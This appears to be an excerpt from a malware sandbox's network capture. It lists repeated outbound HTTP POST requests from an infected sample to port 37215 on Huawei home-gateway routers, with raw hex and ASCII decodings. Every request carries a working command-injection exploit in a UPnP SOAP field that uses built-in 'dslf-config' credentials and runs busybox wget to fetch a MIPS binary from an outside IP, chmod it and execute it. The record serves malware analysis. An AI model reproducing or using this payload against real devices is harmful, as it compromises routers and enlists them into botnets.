                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:25.605608940 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:35.077193022 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:54.532481909 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:17:33.442745924 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              260192.168.2.1434608156.253.39.9837215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:16:18.108170986 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:19.717859983 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:21.637957096 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:25.605611086 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                              Nov 23, 2023 05:16:33.285281897 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
